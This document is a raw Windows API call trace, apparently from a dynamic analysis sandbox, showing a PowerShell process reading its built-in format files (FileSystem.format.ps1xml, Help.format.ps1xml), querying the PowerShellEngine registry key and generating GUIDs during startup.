	[0818.987] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x9639bdbf, Data2=0x62b, Data3=0x469d, Data4=([0]=0xbc, [1]=0x2e, [2]=0xe5, [3]=0x7d, [4]=0x7e, [5]=0x3e, [6]=0xec, [7]=0x6c))) returned 0x0
	[0818.988] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0818.988] GetFileType (hFile=0x308) returned 0x1
	[0818.988] SetErrorMode (uMode=0x1) returned 0x1
	[0818.988] GetFileType (hFile=0x308) returned 0x1
	[0818.988] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.990] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.991] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.991] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.993] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.993] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0818.993] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x119, lpOverlapped=0x0) returned 1
	[0818.993] ReadFile (in: hFile=0x308, lpBuffer=0x355ff40, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x355ff40*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0818.994] CloseHandle (hObject=0x308) returned 1
	[0818.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0818.994] SetErrorMode (uMode=0x1) returned 0x1
	[0818.994] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0818.994] SetErrorMode (uMode=0x1) returned 0x1
	[0818.994] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0818.994] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0818.994] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0818.994] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
	[0818.994] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd33c, lpData=0x1b8ef640, lpcbData=0x1cd338*=0x56 | out: lpType=0x1cd33c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1cd338*=0x56) returned 0x0
	[0818.995] CoTaskMemFree (pv=0x1b8ef640) 
	[0818.995] RegCloseKey (hKey=0x308) returned 0x0
	[0818.995] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0819.001] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1ccee0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0819.002] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xd024fa4f, Data2=0x8883, Data3=0x4143, Data4=([0]=0x90, [1]=0x82, [2]=0x96, [3]=0xb5, [4]=0x65, [5]=0x9, [6]=0xcc, [7]=0x7))) returned 0x0
	[0819.002] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xb1243f02, Data2=0xdbf, Data3=0x46f8, Data4=([0]=0xaf, [1]=0xc7, [2]=0xd1, [3]=0xc1, [4]=0xfc, [5]=0x76, [6]=0x93, [7]=0xf3))) returned 0x0
	[0819.002] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0x6a32c535, Data2=0xd809, Data3=0x48a6, Data4=([0]=0xb9, [1]=0x9f, [2]=0x4a, [3]=0x71, [4]=0x22, [5]=0x88, [6]=0x53, [7]=0x26))) returned 0x0
	[0819.003] CoCreateGuid (in: pguid=0x1cd610 | out: pguid=0x1cd610*(Data1=0xe1645b2e, Data2=0x4e83, Data3=0x4220, Data4=([0]=0x8d, [1]=0x44, [2]=0x8f, [3]=0x2b, [4]=0x99, [5]=0x34, [6]=0x9b, [7]=0xdf))) returned 0x0
	[0819.003] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308
	[0820.064] GetFileType (hFile=0x308) returned 0x1
	[0820.064] SetErrorMode (uMode=0x1) returned 0x1
	[0820.064] GetFileType (hFile=0x308) returned 0x1
	[0820.064] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.065] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.065] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.066] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.066] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.066] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.066] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.066] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.068] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.069] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.069] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.069] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.070] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.070] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.070] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.071] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.074] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.074] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.075] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.075] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.075] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.076] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.076] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.077] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.077] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.077] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.078] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.078] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.078] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.079] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.079] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.080] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.086] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.086] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.086] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.087] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.087] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.087] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.088] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.088] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.089] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.089] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.089] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.090] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.090] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.090] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.091] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.091] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.091] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.092] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.092] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.093] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.093] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.093] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.094] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.094] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.094] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.095] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.095] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.096] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.096] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.096] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x1000, lpOverlapped=0x0) returned 1
	[0820.097] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0xf37, lpOverlapped=0x0) returned 1
	[0820.097] ReadFile (in: hFile=0x308, lpBuffer=0x340099f, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x340099f*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0820.097] ReadFile (in: hFile=0x308, lpBuffer=0x3401300, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1cd358, lpOverlapped=0x0 | out: lpBuffer=0x3401300*, lpNumberOfBytesRead=0x1cd358*=0x0, lpOverlapped=0x0) returned 1
	[0820.097] CloseHandle (hObject=0x308) returned 1
	[0820.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd0a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0820.098] SetErrorMode (uMode=0x1) returned 0x1
	[0820.098] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1cd300 | out: lpFileInformation=0x1cd300*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0820.098] SetErrorMode (uMode=0x1) returned 0x1
	[0820.098] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x1cd030, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0820.098] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cd3e8 | out: phkResult=0x1cd3e8*=0x308) returned 0x0
	[0820.098] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cd36c, lpData=0x0, lpcbData=0x1cd368*=0x0 | out: lpType=0x1cd36c*=0x1, lpData=0x0, lpcbData=0x1cd368*=0x56) returned 0x0
	[0820.099] CoTaskMemAlloc (cb=0x5a) returned 0x1b8ef640
